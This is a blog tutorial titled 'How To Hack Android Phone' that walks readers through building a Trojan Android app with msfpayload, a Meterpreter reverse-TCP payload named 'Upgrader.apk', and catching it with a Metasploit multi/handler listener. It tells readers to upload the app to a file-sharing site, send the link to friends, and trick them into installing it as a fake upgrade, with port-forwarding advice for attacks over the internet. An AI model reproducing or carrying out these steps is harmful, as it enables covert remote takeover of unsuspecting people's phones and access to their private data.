Get the Best Blogging Tips, Earn Money Blogging, Learn SEO and Many other useful guides to lead your life as an online entrepreneur.

How To Hack Android Phone

How To Hack Android Phone
How To Hack Android Phone


Hello tekgyd readers today i am share how to hack android phone. We choose android phone for this tutorial because lately android phone growing very fast worldwide. In this tutorial we  use kali to hack android phones.


Also Read-:How To Hack Android Phone Using Bluetooth

What Is Android?

How To Hack Android Phone


Android is a mobile operating system (OS) currently developed by Google, based on the Linux kernel and designed primarily for touchscreen mobile devices such as smartphones and tablets. Android's user interface is mainly based on direct manipulation, using touch gestures that loosely correspond to real-world actions, such as swiping, tapping and pinching, to manipulate on-screen objects, along with a virtual keyboard for text input Android has the largest installed base of all operating systems of any kind. Android has been the best selling OS on tablets since 2013, and on smartphones it is dominant by any metric.


Steps To Hack Android phone


Step 1: Fire-Up Kali



  • Open a terminal, and make a Trojan .apk
  • You can do this by typing : msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP)
  • You can also hack android on WAN i.e. through Interet by using your Public/External IP in the LHOST and by port forwarding 
    How To Hack Android Phone

Also Read-:How To [LATEST]*Hack Android Devices By AndroRat App Binder 2015 & 2016


Step 2: Open Another Terminal
  • Open another terminal until the file is being produced.
  • Load metasploit console, by typing : msfconsole
    How To Hack Android Phone
Step 3: Set-Up a Listener
  • After it loads(it will take time), load the multi-handler exploit by typing : use exploit/multi/handler
    How To Hack Android Phone
  • Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp
  • To set L host type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external)
    How To Hack Android Phone
Step 4: Exploit!


  • At last type: exploit to start the listener.
  • Copy the application that you made (Upgrader.apk) from the root folder, to you android phone.
    How To Hack Android Phone
  • Then send it using Uploading it to Dropbox or any sharing website (like: www.speedyshare.com).
  • Then send the link that the Website gave you to your friends and exploit their phones (Only on LAN, but if you used the WAN method then you can use the exploit anywhere on the INTERNET)
    How To Hack Android Phone
  • Let the Victim install the Upgrader app(as he would think it is meant to upgrade some features on his phone)
  • However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) from the security settings of the android phone to allow the Trojan to install.
  • And when he clicks Open...


Step 5: BOOM!
  • There comes the meterpreter prompt:
    How To Hack Android Phone

So all of above is related to how to hack android phone .Hope you like this . If you have any query then comment below.

, , , , ,

No comments:

Post a Comment